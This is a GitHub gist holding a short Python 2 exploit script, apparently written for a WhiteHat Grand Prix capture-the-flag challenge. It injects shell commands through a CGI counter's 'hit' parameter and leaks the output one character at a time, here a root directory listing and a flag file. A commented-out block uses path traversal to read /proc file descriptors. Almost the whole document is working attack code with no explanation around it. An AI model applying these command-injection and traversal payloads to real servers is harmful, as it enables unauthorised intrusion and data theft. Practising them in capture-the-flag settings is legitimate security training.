Instantly share code, notes, and snippets.

Embed
What would you like to do?
import requests
cmd ='printf "%s|" /*'
# cmd = 'printf "%s|" /Sup3r_S3cr37_15_H3r3'
for i in xrange(400):
a = requests.get('http://lab4b.grandprix.whitehatvn.com/cgi-bin/counter?hit=`a=$('+cmd+'); b=${a:'+str(i)+':1}; printf "%d" "\'$b"> /run/cgicounter`;')
print chr(int(a.text.split(" ")[1].split("}")[0])),
'''
for fd in xrange(100):
a = requests.get('http://lab4.grandprix.whitehatvn.com/?game=../../../../../../../../../../../../../../../../proc/9229/fd/'+str(fd))
print fd, a.text.split('<div class="col-lg-4">')[0].split('<div class="col-lg-8">')[1]
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment